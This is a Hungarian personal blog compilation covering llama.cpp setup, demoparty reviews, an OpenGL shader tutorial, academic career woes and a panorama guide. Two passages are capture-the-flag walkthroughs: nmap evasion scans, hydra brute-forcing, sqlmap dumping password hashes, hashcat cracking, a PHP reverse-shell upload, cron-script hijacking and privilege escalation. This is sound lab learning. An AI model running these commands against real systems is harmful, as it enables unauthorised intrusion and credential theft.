Mint már sejthetitek, ez a legmelósabb. Teljesen nyílt forráskódú, nekünk kell lefordítani. Csak CPU-n is elzakatol, de ha van Cuda, akkor GPU-n futó változatot is fordíthatunk. Először letöltjük GitHub-ról:

git clone https://github.com/ggml-org/llama.cpp
cd llama.cpp
mkdir build
cd build

Utána fordíthatjuk a programot. Ha van 10 felesleges processzormagunk, akkor a -j 10 opcióval gyorsíthatjuk a folyamatot.

cmake -B build -DGGML_CUDA=ON ..
cmake --build build --config Release -j 10

 A program a GGUF formátumú modelleket tudja használni, de nincs semmi ellenőrzés benne, ezért előfordulhat, hogy rossz modell esetén a szokásosnál is hülyébb válaszokat generál. Például én először a stabilityAI stable-code-3b modellel próbálkoztam, és nagyon furcsán viselkedett a program. Elkezdett írni egy választ, majd végtelen ciklusban ismételgette az utolsó mondatot. De lássuk, hogyan is lehet használni:

llama.cpp -hf ggml-org/gemma-3-1b-it-GGUF

Letölti a HuggingFace-ről a kívánt modellt. A fájl Linux esetén a .cache/llama.cpp/ könyvtárban lesz. Ha használni akarjuk, akkor -m opcióval tehetjük meg.

llama.cpp -m ggml-org_gemma-3-1b-it-GGUF_gemma-3-1b-it-Q4_K_M.gguf --offline

Igen, a fájl neve kicsit megváltozik.

A fent bemutatott három módszer mindegyikével képesek leszünk saját környezetben futtatni nagy nyelvi modelleket. Az egyetlen limitáció a hardver vagy az internet sávszélességünk, amikor letöltjük a modellt. Utána ha felfordul a CloudFlare, akkor is tudunk hallucinációkon röhögni.

Idén is összegyűltek a demóra éhes emberek, hogy együtt megnézzék az év legjobb alkotásait. Idén sem hiányozhatott a könnyed hangvételű verseny sem, ahol többségében hazai scenerek megvillantják tudásukat. Jellemzően nem itt szokták elpuffogtatni a legmenőbb demókat, de a közönség azért jót szokott szórakozni. Lássuk, mit kaptak, akik ellátogattak a rendezvényre:

Week after the ninth moon

Netro tavalyhoz hasonlóan most is a saját életéből merített, amikor elkészítette ezt a demót. Egy csillaggyermek születését láthattuk azokkal a jelenetekkel, amelyek a 2001 Űrodüsszeiából kimaradtak.

X marks the...

Ez egy 8k intró volt sok szép objektum morpholással, textúra animációval. Nyaki engine újabb funkciókkal bővült.

Sk8

Egy másik 8k intró gördeszkázó lábakról. A mozgás, a trükkök nagyon igényesek voltak.

A kocka

Tomcat szokás szerint 256byte intróval jelentkezett. Nagyon szép shadelt kocka forgott.

SUGi

Pasy és Teo egy klasszikus stílusú demót hozott. Az alacsony felbontás nekem zavaró volt, de gondolom így könnyebb volt a valós idejű tükröződéseket megvalósítani.

Teletextperience

Kaszi megmutatta humoros oldalát, ami nekem nagy meglepetés volt. Az utóbbi idők egyik legkreatívabb greetingjét láthattuk. Egy ilyen demó nyilvános vetítésével könnyen kiszűrhető nagy tömegből, ki a scener, mert csak ők fognak nevetni a belsős poénokon. Szóval nekem nagyon tetszett, a többiek meg így jártak.

Interstellar phenomenon

Ez egy DOS-os demó, de jeleneteket elnézve a legtöbbje videóként futott. A demó szerint földönkívüli életforma akár létezik, akár nem, csak depresszióssá tesz minket, embereket. (Számtalan sikerkönyv szerzőjét meg gazdaggá.)

Egy szaftos pörkölt

Néha nem kell bonyolult dolog a boldogsághoz. Elég hozzá kockákra textúrázott hús és szaft, némi sorozatban gyártott nokedlivel, aminek minden darabja pontosan ugyan olyan. A menzán nem lenne probléma az adagolással. Ha pedig  a villa is beletörik, az nem a szakács hibája.

demojoe the computer maker

Az évek során Demojoe sok kalandját megismerhettük. Demojoe ebben a 4k intróban nagyon megjárta. Nem elég, hogy kvantum-számítógépet készített, még a létezése is határozatlan lett. Mennyivel jobban járt volna egy Raspberry Pi-al...

Jane Goodall Tribute

Ez a plus4 demó Jane Goodall-nak állít emléket. Nagyon szép gesztus, szeretem, ha demók híres emberekről szólnak.

Radiosity2

Musk radiosity engine-t írt, aminek ez a szép procedurális grafika lett az eredménye. Az alkotás keresztplatformos, Linux alatt is élvezhető.

Ez egy jó kis összefoglaló feladat, ha az ember azt akarja tesztelni, mennyire tud jól szervert scannelni. Az első kérdés megválaszolására csak alap szkennelés kell. Mivel csak a 10 ezer alatti portokra kíváncsiak, ezért elég ez:

nmap -p 0-10000 $IP

A második kérdés, hogy melyik 10000 feletti port van nyitva? Abból kiindulva, hogy valószínű a nyitott port közelebb van a 10000-hez, mint a 65535-höz, egy ilyen scannel lehet megtalálni:

nmap -Pn -sS -p10000-11000 $IP

A -Pn -sS kapcsolók most csak arra szolgál, hogy gyorsan lefusson a scan. A következő kérdés, hogy mennyi TCP port van nyitva? Itt a biztonság kedvéért minden porton lefuttatjuk a keresést, ez jó sokáig fog tartani. Az -sT csak TCP protokollal próbálkozik nézi.

nmap -Pn -sT -p- $IP

Mi a HTTP fejlécben a flag? Ez nagyon egyszerű, a böngészőben előhívjuk a developer módot, és Firefox esetén a Network oldalon kilistázza az összes fejlécet. Keresni kell valamit, amit THM-el kezdődik.

Mi az SSH fejlécben a flag? Az -sV opció kilistázza a szolgáltatás verziószámát. A port pedig a 22-es.

nmap -p 22 -sV $IP

Mi az FTP szerver verziószáma, ami a nem szokványos porton van? A nyitott portokat a korábbi keresések során azonosítottuk, annyit kell tenni, hogy ismét lefuttatjuk a keresést a -sV opcióval. Ez még egyszer nem írom le, csak a port szám más.

Az FTP szerverhez kapunk két felhasználói nevet. A feladat, hogy megnézzük, milyen fájlokat tárolnak. Ehhez a hydra kell. A felhasználói neveket mentsük el egy users.txt fájlba, és akkor a következő parancsot használhatjuk (feltéve, hogy Kali linuxot használunk, és ott a jelszófájl az /usr/share/wordlists-ben van).

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -s 10021 $IP ftp

Az utolsó feladat, hogy úgy scanneljük a szervert, hogy a tűzfal ne vegye észre. A detektálást a 8080-as porton nézhetjük a böngészőből. Ez a feladat nagyon megizzasztott, mert túl bonyolultan gondolkodtam. Először bedobtam mindent, amit csak lehet:

nmap -T0 -Pn -sN -ff -vv $IP

Az -ff fragmentálja a küldendő csomagokat, hogy a tűzfal nehezebben vegye észre. A -sN egy null scan, ami azt jelenti, hogy a TCP fejlécben semmilyen bitet nem állít be, a -T0 pedig hosszú időt hagy két kérés között, így van rá esély, hogy elsikkad a keresésünk a hálózati "zajban". Persze nem működött. Akkor jött a

nmap -T0 -Pn -sX -ff -vv $IP

Ez egy másik fajta scan, amit beállít néhány TCP flaget. Ezzel is lebuktam. Ráadásul a -T0 miatt minden scan kegyetlen hosszú lett. Miután ez is lefutott eredménytelenül, tovább fragmentáltam a csomagokat, meg további ostoba opciókat adtam meg, amiről azt gondoltam, hogy jók lesznek. A keresések egyre rosszabb eredményeket adtak, mert már annyira óvatosan scanneltem, hogy a szerver válasza alapján nem lehetett eldönteni, melyik port van nyitva. Végül kiderült, hogy csak a null scan-t kellett volna használnom:

nmap -sN $IP

Végül is benne volt a korábban megadott opciók között...

Elmentem egy ingyenes workshopra, amit a Black Cell szervezett. A regisztráció szerintem teljesen felesleges volt, annak valószínűleg az adatgyűjtés lehetett a lényege, mert még egy megerősítő email-t sem küldtek. Aggódtam is, hogy érkezés után majd nem engednek be. A félelmem alaptalan volt, belépés után kértek egy nevet, amit egy telefonba bepötyögtek. Utána már mehettem is egy nagy terembe.

A terem akkusztikája rettenetes volt, a projektor képét alig lehetett látni, elolvasni lehetetlen volt. Márpedig figyelni kellett, mert, atya világ!, az előadó annyi információt zúdítottak ránk, mint Mr. X. Képtelenség volt jegyzetelni. Ez nem az EC-Council harmatgyenge, hiteltelen előadója volt, rajta látszott, nem csak érti, hanem műveli is a területet. Számtalan sztorit is hallottunk tőle, amitől úgy érezte az ember, hogy az előadás, nem egy felolvasott whitepaper, vagy kiszemezgetett összefoglaló, hanem a napi meló része. A hallgatóság is hozzászólhatott, és nagyon kevés alkalom volt, hogy az előadó azt mondta, hogy erről nem hallott.

Az előadást tudtam követni, de azért éreztem, hogy nekem ez még nem megy olyan folyékonyan, mint a többieknek. Többször volt, hogy azt hittem, még soha nem hallottam az adott technikáról, aztán két perccel később beugrott, hogy TryHackMe-n csináltam egy egész modult belőle. Ez a különbség, ha az ember munka mellett, vagy munkaként űzi ezt a mesterséget.

Azért volt a profik között is olyan, akiknek meggyűlt a baja az információmennyiséggel. Egy fickó a végén azt mondta nekem, hogy most hazamegy, és utánaolvas ennek az információ mennyiségnek, mert az elmondottak egy jó része vadi új volt neki.

Az ebédszünetben összeismerkedtem egy etikus hackerrel. Mivel ő jellemzően támadni szokott, a detektálási metodikák nem vágtak a profiljába. Kérdeztem, hogyan került erre a pályára? Azt mondta, hogy ő először üzemeltetéssel foglalkozott nagyon sokáig, csak az utóbbi egy évben nyergelt át a vörös csapatba. Nincs semmi szakirányú végzettsége, sem papírja, elmondása szerint az angoltudása is passzív, csak a Hack The Box-ot nyomta ezerrel. Először csak a leírások alapján törte a gépeket, majd egyre inkább elhagyta a segédleteket, és a végén már ment neki rutinból a teljes folyamat.

Megkérdeztem tőle, mi van, ha az ember nem talál semmit egy sérülékenység vizsgálat alkalmával? Azt mondta, ő még olyan nem látott. Mindig van valami rés. A beszélgetés mindenesetre visszaadta a reményt, hogy esetleg nekem is van esélyem betörni a piacra.

Szerintem voltak kívülállók is, mert egy fura fazon olyan kérdéseket tett fel, hogy "mi a legjobb laptop", meg "beszéljen a Pegasus-ról". Az előadó meg is kérdezte, hogy újságíró-e. Ilyen noob kérdéseket YouTube komment szekciókban tesznek fel. Ettől függetlenül nagyon hasznos volt, én nem bántam meg, hogy elmentem.

Már többször is utaltam rá, hogy az akadémiai szféra kezd szűkülni. Azt gondoltam, van még pár évem, mielőtt váltani kellene, de a dolgok nagyon felgyorsultak.

Technikailag két munkahelyem van, a másodállásomból november 1-el elküldtek. Már szeptember végén mondták, hogy nem lesz maradásom, amit tudomásul is vettem. Éreztem én is, hogy egyre kevesebb a lehetőség és nem is akartam maradni.

Egy hónappal később oda is tolták az orrom alá a papírt, hogy közös megegyezéssel lépjek le. Mivel határozatlan idejű volt a szerződésem, úgy gondoltam, jár nekem a végkielégítés, ezért azt mondtam, hogy nem írom alá, rúgjanak ki. A máskor oly lassú bürokrácia nagyon felgyorsult, de nem úgy, ahogy számítottam rá. Másnap bejött a főnököm, pedig nem szokott, és közölte, hogy nem tudja a helyemre felvenni a PhD hallgatóját, amíg el nem távolítanak. Ha viszont ide nem tudja felvenni, akkor a főállásomra fogja, és onnan rúgnak ki. A helyzetet árnyalja, hogy a PhD hallgató szíriai, jogviszony nélkül kitoloncolják. Ez van, ha túl sok helyen ugyan az a főnököm. Hogy tompítsa a zsarolás élét, azt is mondta, hogy el tudja intézni, hogy továbbra is bejárhassak. Hiába, az ingyenmunka az mindenkinek jól jönne.

Bioinformatika állások viszont alig vannak Magyarországon. Utoljára nyáron láttam, hogy kerestek valakit, Szegeden. Az intézeti csoportoknak alig van pénze, pályázati lehetőségek szinte nincsenek. A főállásom majd nyáron fog megszűnni, mert addigra apadnak ki az ottani források. Utána majd izgalmasabb lesz az élet.

Nem tudom, hol fogok kikötni, nem tudom, mit fogok csinálni, de úgy gondolom, nagy változások lesznek, ami a blogra is kihatással lesz. Még azt is elképzelhetőnek tartom, hogy meg fognak szűnni a bioinformatikai írások. Valószínűleg lesznek még ilyen jellegű munkáim, mert ígéretek vannak (ígéretek mindig vannak), de nem biztos, hogy erről írok posztokat.

Alapvetően nem vagyok elkeseredve. Nem fognak hiányozni az előadáson telefonozó hallgatók, a rosszul megtervezett kísérletek, a görcsös publikálási kényszer, a kutatók kedvenc génjei, a közbeszerzés, a publikációs vállalások, a lecseszés, hogy miért nem teljesültek a vállalások, a tudománymetriai táblázatok, a Wilcoxon-tesztek, a PhD hallgatók, akik úgy mutatják be a védésen az ábráimat, mintha ők csinálták volna a teljes in-silico elemzést, az elküldött eredmények utáni nagy kussok, az MDPI spamek a levelek között. Ezeknek vége:

Most még optimista vagyok és lehetőségeket látok. Lehetőséget, hogy valami újat és érdekeset csináljak. Már csak az a kérdés, hogy mások is látják-e bennem a lehetőséget.

Igértem, hogy írom a bugról, amit Jimmy segített megoldani. A hiba a point sprite-okkal volt.

A point sprite a legegyszerűbb a megjeleníthető alakzatok közül, mert egy fix méretű folt a képernyőn, de nagyon sok lehetőséget rejt magában, főleg ha shaderekkel megbolondítjuk.

Az alapja egyszerű, kell egy vertex array, amiben egyedül a pontok koordinátáit kell elhelyezni. Természetesen ha egy részecske rendszert akarunk, akkor további attribútumokat is pakolhatunk a koordináták mellé, de most ezzel nem foglalkozom.

Először lehetővé kell tennünk, hogy a shaderünk teljes egészében kezelhesse a point sprite megjelenését:

glEnable(GL_PROGRAM_POINT_SIZE);

Ezután fel kell tölteni egy puffert koordinátákkal. Ez teljesen olyan, mint amit bármelyik más OpenGL programban is találunk:

glGenVertexArrays(1, &vao);
glBindVertexArray(vao);

glGenBuffers(1, buffer);

glBindBuffer(GL_ARRAY_BUFFER, &buffer);
glBufferData(GL_ARRAY_BUFFER, sizeof(GLfloat) * 3 * count, &pos[0], GL_DYNAMIC_DRAW);
glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, 0);
glEnableVertexAttribArray(0);

glBindVertexArray(0);

A megjelenítés is nagyon egyszerű:

glUseProgram(shader);
glBindVertexArray(vao);
glDrawArrays(GL_POINTS, 0, count);

De mi legyen a shader-ben? Itt kezdődnek a lehetőségek. A tutorialok ki is merülnek abban, hogy leírják a vertex shadert és a fragment shadert. De nagyon kevés szó esik a geometry shaderről, pedig azzal lehet csak igazán megbolondítani a pontjainkat.

A vertex shader nagyon egyszerű:

#version 450

layout (location = 1) in vec3 vertex;

void main(){
  gl_Position = vec4(vertex, 1.0);
}

A legtöbb tutorial ide helyezi a point sprite méretét meghatározó változó értékadását. A változó neve gl_PointSize. Ez pixelben meghatározza, hogy mekkora legyen a képernyőn a sprite-unk. Ha nincs geometry shaderünk, továbbra is itt kell beállítani.

De miért jó a geometry shader? Egyáltalán minek kell? A geometry shaderrel megváltoztathatjuk a pontunkat. Például több pontot csinálunk belőle! Esetleg háromszöggé változtatjuk azt. Különböző méretű pontokat készítünk.

#version 450

layout (points) in;
layout (points, max_vertices = 1) out;

void main() {
   gl_Position = gl_in[0].gl_Position;
   gl_PointSize = 6.0;
   EmitVertex();
   EndPrimitive();
}

A layout in és out határozza meg, mi legyen a be és kilépő geometria. A fenti példában ezek pontok, de semmi nem akadályozza meg, hogy kilépésnél vonal, háromszög vagy négyszög legyen. Ha több geometriát is akarunk kimenetnek, akkor a max_vertices értéket ennek megfelelően emelni kell. A főmenüben kell definiálni a pont tulajdonságait. Először a koordinátáit a gl_Position-al, majd a méretét. Ez nem volt nekem tiszta. Bár utólag logikus, hiszen én több pontot is készíthetek, azok nem fogják "örökölni" a tulajdonságokat a vertex shaderből, hanem nekem kell beállítanom. A két végső utasítás az EmitVertex() és az EndPrimitive(). Pontok esetén primitívenként egy vertexet tudunk létrehozni, háromszögek esetén háromszor annyi EmitVertex utasítás kell, mint EndPrimitive.

Végezetül jöjjön a fragment shader, ahol a pont megjelenését tudjuk befolyásolni. A legunalmasabb fragment shader, amit csak létezik a következő:

#version 450

layout (location = 0) out vec4 FragColor;

void main(void){
   FragColor = vec4(1.0, 1.0, 1.0, 1.0);
}

Egy fehér négyzetet fogunk látni, olyan méretben, ahogy a gl_PointSize-al megadtuk. A gl_PointCoord viszont ad nekünk pozíciót a ponton belül. Ezt használhatjuk például textúrázásra, ahogy a legtöbb internetes példa említeni szokta. Ha nem akarunk textúrázni, akkor is hasznunkra lehet, ha a discard-ot használjuk.

#version 450

layout (location = 0) out vec4 FragColor;

void main(void){
   float d = distance(gl_PointCoord, vec2(0.5));
   if(d > 0.5) discard;
   else FragColor = vec4(1.0, 1.0, 1.0, 1.0);
}

Az eredmény szép kör alakú pontok lesznek. Kísérletezzünk bátran egyéb módszerekkel!

A kritika egy visszajelzés a munkánkról. Ha a kapott kritika nem tetszik, akkor is el kell gondolkodni, hogy miért kaptuk, mert lehetőséget kaptunk, hogy egy más szempontrendszeren keresztül lássunk. A kritikának nem kell alávetni magunkat, de akkor is meg kell vizsgálni a munkát a kritikus szemszögéből is.

Tudom, hogy a média, a filmek, regények imádják az olyan hősöket, akik nem hallgatnak senkire, csak mennek a maguk feje után, mert nem alkusznak meg, és nem engednek a víziójukból. Miután elérik céljukat, akkor a tömegek térdre hullanak a nagyságuk előtt: Lám, milyen jól tette, hogy magasról tett mások véleményére!

Szeretjük a meg nem értett zseniket. A diktátorokat viszont nem, holott nagyon hasonló attitüdjük van. A kettő között az lehet a különbség, hogy a meg nem értett zseni mérlegeli a kritika jelentőségét, míg a diktátor egyszerűen elnyomja azt.

A tudományos publikációkban a kritikát elsősorban a bírálók gyakorolják. A rendszer nem tökéletes, mint azt többen, több helyen felvetették, de szükséges, különben ilyen rettenetes cikkek születnek.

Mikor először elküldték nekem a kéziratot, nem hittem a szememnek. Olyan rossz volt, hogy azon gondolkodtam, nem adom hozzá a nevemet. A rövidítések értelmezhetetlenek voltak, több helyen nem értettem, mit akartak leírni, pedig én is dolgoztam a témán! Végül úgy döntöttem, mégis a szerzők között maradok, mert biztos voltam, hogy nem fog megjelenni, másrészt nem akartam megint én lenni a kerékkötő. (Ráadásul szerencsétlen PhD hallgató posztert készített a témából egy konferenciára, ahol szó szerint kiröhögték, nem akartam még én is belerúgni.)

Elsőnek a BMC Genomics-ba küldtük be, ahonnan nagyon gyorsan kivágták. A fő problémák a következők voltak: nincs validáció, anekdotán alapuló eredmények vannak, a statisztika teljes hiánya, a szöveg repetitív, a rövidítések értelmezhetetlenek, az ábrák követhetetlenek.

Én őszintén megnyugodtam. Úgy látszik azért lehet a tudományban bízni, mert a nagyon ócska eredmények még mindig fennakadnak a rostán, miközben nekem sem kellett fekete bárányt játszani a csoportban. Win-win.

Másodszor az Animals című újságba került, ami az MDPI alá tartozik. Habár nem jelzik predátor folyóiratnak, azért nagyon-nagyon közel van hozzá. Itt is nagyon kemény kritikát kapott, hatalmas változtatásokat kért az egyik bíráló. Én továbbra is bíztam a rendszerben, nem foglalkoztam az egésszel.

Ekkor különös dolog történt. Az egyik szenior szerző írt az újság szerkesztőinek, hogy a bírálat rosszindulatú, a cikken nem változtatunk semmit, jelentessék meg ebben a formában. A szerkesztők egy hétig gondolkodtak, majd azt mondták: rendben. Leközölték a cikket a bíráló ellenében! Újabb egy hét, és a cikk DOI számmal, nyomtatható formában megjelent.

Már bánom, hogy nem kapálóztam jobban, még akkor is, ha már teljesen mindegy, mi jelenik meg a nevem alatt. Minden esetre a PhD hallgatónak publikáció pipa, mehet védeni. Az újság megkapja a publikációs kötlségeket: pipa. A témavezetőnek az újabb végzett PhD hallgató pipa, az egyetem által előírt vállalás, hogy megjelenik egy újabb publikáció: pipa. Az intézet prezentálhatja a cikket az egyetem felé, az egyetem meg a nagyközönség felé, hogy mindenki milyen jól dolgozott. Rajtam kívül nincs senkinek semmi problémája.

Egy hétfői napon kaptam a levelet, hogy megjelenik a cikk, kedd reggel egy másik email is jött, hogy a cikket kiválasztották a "Best Science Award"-ra. Botanikából. Egy nyulakról szóló cikket! A részvételhez ki kellett volna tölteni egy űrlapot, ahol a személyes adatok megadása mellett nekem kellett kiválasztani, milyen díjra jelöljék a cikkemet. A formon nem volt semmilyen ellenőrzés, annyiszor tölthettem volna ki, ahányszor csak akarom, olyan jelölésekkel, amilyennel csak akarom. Gondoltam magamban, sokat érhet ez a díj is. (Valószínűleg az adatgyűjtés az elsődleges célja.)

Ez számomra egy nagyon nehéz CTF volt. Több napon keresztül kellett futtatni a programokat, és sok csapda is volt, ami tévútra vezetett. Azért a végére sikerült megoldani.

sudo nmap -p- -nP $IP

Csak három port volt nyitva, lássuk, milyen szolgáltatások vannak mögötte:

sudo nmap -sV -p 22,80,445 $IP

Egy SSH és két HTTP. Mindkét weboldalon csak az alapértelmezett Apache üzenet van, a forráskódban sincs egyetlen árva megjegyzés sem. Jöhet a weboldalak átnyálazása:

gobuster dir -u $IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir -u $IP:445 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Nagyon kevés találat jött fel, ezért próbálkoztam más listákkal is:

gobuster dir -u $IP:445 -w /usr/share/wordlists/dirb/big.txt
gobuster dir -u $IP:445 -w /usr/share/wordlists/dirb/others/best1050.txt

Nem számított, a 80-as porton egy /admin /passwd /shadow fájlokat fedeztem fel. Mindegyik mögött egy base64 kódolású fájl volt. Dekódolás után ezt kaptam: not this easy :D Az admin sem volt bíztatóbb: Trust me it is not this easy..now get back to enumeration :D

Oké, a 80-as portot el lehet felejteni. Jöhet a 445-ös. Egy oldal jött csak fel: /management. Tovább kerestem:

gobuster dir -u http://10.10.157.64:445/management -w /usr/share/wordlists/dirb/big.txt

Ez már sokkal érdekesebb volt. Találtam például egy adatbázis dump-ot, amiben md5 hash-elt jelszavak voltak, illetve egy /management/classes/login.php bejelentkezést. A hasheket egész könnyen lehetett visszafejteni:

hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt

Persze egyik jelszó sem működött a bejelentkezésnél. Nem volt semmi információm, csak egy login form, meg egy uploads könyvtár. Talán SQL injection működik? Először kézzel próbálgattam, de nem sikerült semmit elérnem. Nézzük meg, valami eszköz tud-e jobbat.

Burp Suit-al lementettem a POST kérést, majd sqlmap-el nekiestem.

sqlmap -r request.txt --dbs

Úgy tűnik a blind injection működik, az adatbázis kezelő pedig MySQL. Blind injection-nél a lekérdezéshez egy sleep-et adunk. Ha a lekérdezés sokáig fut, akkot találtunk valamit. Ha gyorsan lefut, akkor nincs találat. Ezzel a módszerrel karakterenként visszakaphatjuk a teljes adatbázis tartalmát. Mint látható, ez egy gyötrelmesen lassú módszer, ezér nem a teljes adatbázisra, hanem a számomra lényeges adatokra koncentráltam. Lássuk a táblákat:

sqlmap -r request.txt --tables --dbms=mysql -D tms_db

A korábban megtalált adatbázis dump mégis hasznos volt, mert kiderült számomra, hogy ha az adatok nem is, de az adatbázis szerkezete változatlan. Ezért csak a users tábla két oszlopára koncetráltam:

sqlmap -r request.txt --dump --dbms=mysql -D tms_db -T users -C username
sqlmap -r request.txt --dump --dbms=mysql -D tms_db -T users -C password

Bingó, van felhasználó nevem és jelszó hash-em! Azért így is jó sokáig tartott, amig ezeket az információkat megszereztem. A korábbi hashcat paranccsal próbálkoztam, de csak a puser jelszavát tudtam törni. Az admin jelszóval megint nem volt szerencsém.

A weboldal elég összetett, sok modulból áll, viszont a funkciók száma nagyon korlátozott. Gyakorlatilag semmit nem lehet csinálni. Megváltoztathatom a jelszót, meg új képet tölthetek fel magamról. Ácsi! Feltöltés? Kipróbáltam, de semmilyen megkötés nem volt arra, mit is töltök fel. Az uploads könyvtárt már korábban megtaláltam. Feltöltöttem egy PHP reverz shellt, és volt hozzáférésem a géphez. Igaz, csak egy www-data, de akkor is lehetett parancsokat gépelni. Az /etc/passwd alapján azt is tudtam, hogy a plot_admin felhasználó lesz a következő célpont.

Először ssh-val végigpróbáltam az összes megtalált jelszót, de az nem működött. A /var/www/html könyvtárban voltak még más konfigurációs állományok, de az ott található hash-ek, jelszavak is zsákutcának bizonyultak. A crontab viszont hasznos volt. Kiderült, hogy a plot_admin percenként futtatja a /var/www/scripts/backup.sh-t. Az egyetlen probléma, hogy a szkriptet nem tudom szerkeszteni. A benne található parancsok mind abszolút elérési úttal voltak megadva.

A könyvtárban bóhóckodtam egyik alkalommal, amikor véletlenül letöröltem a backup.sh-t. Ezen meglepődtem, úgy tudtam csak akkor tudok letörölni valamit, ha van a fájlhoz írási jogom. Ismét tanultam valami a Linuxról. Akkor tudok letörölni valamit, ha a könyvtárhoz van írási jogom. Még a root fájlokat is törölhetem a könyvtáramból. Készítettem egy új backup.sh-t, de ebben már egy reverz shell volt. A revshell.com-ról kipróbáltam párat, de csak a python-os működött.

Oké, most már van plot_admin-os hozzáférésem is, a user.txt-t tudom olvasni. Hogyan leszek root?

A sudo -l jelszót kér, ami nekem nincs. Kilistáztam a suid bites fájlokat:

find / -perm -u=s 2>/dev/null

Semmi. Crontab semmi. Felmásoltam a linpeas-t a gépre, és lefuttattam. Egyetlen szekció volt érdekes, mégpedig a doas. Ez meg mi a fene? Utánaolvasva kiderült, hogy a doas olyan, mint a sudo. A konfigurációs állomány szerint az openssl-t tudom futtatni root-ként.

A GTFOBins receptjeit lehet használni, csak a sudo helyett doas-t kell írni. Az újabb reverz shell nem akart működni, de a fájl olvasás igen:

doas openssl -enc -in /root/root.txt

Sikerült!

Bizonyára mindenkivel előfordult már, hogy le akart fotózni valamit, ami nem fért bele az objektív látószögébe. Például egy szűk utcában nem tudunk eléggé eltávolodni a témától, vagy olyan nagy a téma, hogy képtelenség megörökíteni a rendelkezésre álló lencsével.

Szerencsére már a harmadosztályú mobiltelefonokat is felvértezték panoráma funkcióval, ami képes több képet összefűzni. Sajnos ez a funkció nagyon felhasználó barát, ami azt jelenti, hogy nincs lehetőség a finomhangolásra. Ha az összefűzés valami miatt nem sikerül tökéletesen, képtelenség utólag kijavítani. Arról az apróságról nem is beszélve, hogy sokszor nem mobillal fényképezünk. Legalábbis én nem. Szeretek batár vázakat és objektíveket cipelni a hasznos teher rovására.

Ezért imádom a Hugint. Ez egy panoráma készítő program, ezt használtam például az egyik konferencia dokumentálására. Nyaralás után is segít, hogy az emlékek szépek legyenek.

Megpróbálkoztam a program fordításával is, de nem jártam sikerrel. Az OpenEXR kell neki, de a legújabb verzióval a vigra valahogy összeakad, és a Hugin a végén nem fordul. Nagyon csalódott voltam, mert kénytelen voltam egy kicsi laptop csomagkezelőjével telepíteni. (Érdekesség, hogy azon sincs OpenEXR támogatás.)

A panoráma készítést már a kép elkészítésének pillanatában tervezni kell. A képek legalább 1/3-a átfedjen, és ezen az átfedésen legyen változatos a háttér, hogy a program megfelelő segédpontokat találjon az összefűzéshez. Egy kék ég nem nagy segítség, akár csak a folyton mászkáló emberek. Az exif információk is fontosak, mert a fényképezőgép elmenti a fókusztávolságot, amit a Hugin képes kiolvasni és az összefűzéshez felhasználni.

Elméletileg a különböző expozícióval készült képeket is kezeli a program, de ez nagy rutint igényel, nekem legtöbbször szellemképes lesz tőle a fotó, én inkább kerülöm.

Az elkészítés sorrendje tetszőleges. Ha megvan a kiszemelt célpont, kezdjünk el kattintgatni, és kicsi fordulatokat tenni a kamerával. Zoom-ot lehetőleg ne változtassunk, hacsak nem vagyunk profik a program használatában (nekem nem volt vele szerencsém, szellemképeket produkált).

A panoráma elkészítése három lépésből áll: képek betöltése, illesztés, végső panoráma elkészítése.

A képek betöltéséről nem lehet túl sokat mondani. Csak válasszuk ki a fájlokat. Ha hiányos az exif információ, akkor kérdéseket tehet fel a program, hogy pótolja a hiányzó információt, például az objetív  fókusztávolságáról.

Az illesztés már érdekesebb. Lehetőség van saját kontrollpontokat is felvenni, de tapasztalatom szerint a program elég jó munkát végez. Ahol viszont hasznos az emberi beavatkozás, az annak a meghatározása, hogy az egyes képekből mely részek látszanak. Ha például egy forgalmas helyen fényképezünk, akkor ugyan az a járókelő több képen is előfordulhat, különböző helyen. Összefűzésnél szellemalakként jelenhet meg. Ezen segíthet, ha nem egyes képeknek nem a teljes területét használjuk fel.

Végezetül a perspektíva beállításával is lehet játszani. A felhasználói felület apró súgókkal segít, hogy melyik perspektíva milyen előnyökkel és hátrányokkal jár. Ha például egy magas épületet fényképezünk a földről, nem mindegy, hogy a képen az épület teteje összenyomódik-e, vagy ha tornyai vannak, akkor azok egymás felé dőlnek vagy sem. Szerencsére húzd és vidd módszerrel lehet állítani a paramétereket.

A végső képet is több módszerrel készíthetjük. Az egyiknél lehetőség van a különböző expozíciók egymásra rétegezésével is dolgozni, de nekem JPEG esetén mindig szellemképeket produkált (OpenEXR támogatásom meg nem volt.)

Remélem ezzel a rövid kis bemutatóval mindenkinek kedvet csináltam ahhoz, hogy ne a telefon beépített panoráma funkcióját használja, hanem a Hugint és készítsem lélegzetelállító képeket.

AI Wild

Nekem ebben a kompóban nem is a végeredmény a legérdekesebb, hanem a folyamat, ahogy elkészültek az alkotások. A release-k tartalmazzák a promptot is, amivel elkészítették a képet, zenét, videót. Persze vannak olcsó megoldások, mint amilyen a Just a lameass, ahol Pander beírta, hogy készüljön egy Assembly győztes grafika, amin van csaj, meg régi számítógépek. Nem meglepő módon utolsó előtti lett. De például a Kryptokasanova esetén a dalszöveget ChatGPT-vel módosította, hogy sokkal ütősebb legyen, és a Sumo promptot is azzal íratta meg.

Short film

Továbbra sem tudok finnül, úgyhogy nem sok örömöm volt a filmekben. Az első helyezett How to not use a camuflage legalább angol nyelvű volt, de az sem hozott lázba. Biztos túl sokat játszottak az új Metal Gear Solid játékkal.

Fotó

Többségben voltak a műteremi tárgyfotók. Nekem legjobban a kissé szentimentális Never forget című kép tetszett.

Listening music

Elég jó zenék voltak, ez nem szokott meglepni egy Assembly-n. Aikapallo munkásságát szoktam követni, idén talán kicsit gyengébb volt, amit beadott, de így sincs oka szégyenkezni. Bizonyára a nagyobb energiákat a demókba fektette (mert az viszont ütött, de arról majd később). A Circuit Breaker vitte nálam a prímet, de ezen a kettőn kívül is voltak jó zenék.

Dance music

Ezt a kompót is szívesen hallgattam végig. Nem is baj, nem szeretem, amikor már alig várom, hogy vége legyen a kompófillereknek. Nem is szeretnék egyet kiemelni. Function kill MuLperitől, Omphalos Avenumtól. Másodszorra végighallgatva lehet, hogy másoknak túl repetitívnek fognak tűnni, mert a stílus elég hasonló, de nekem bejönnek.

4k intro

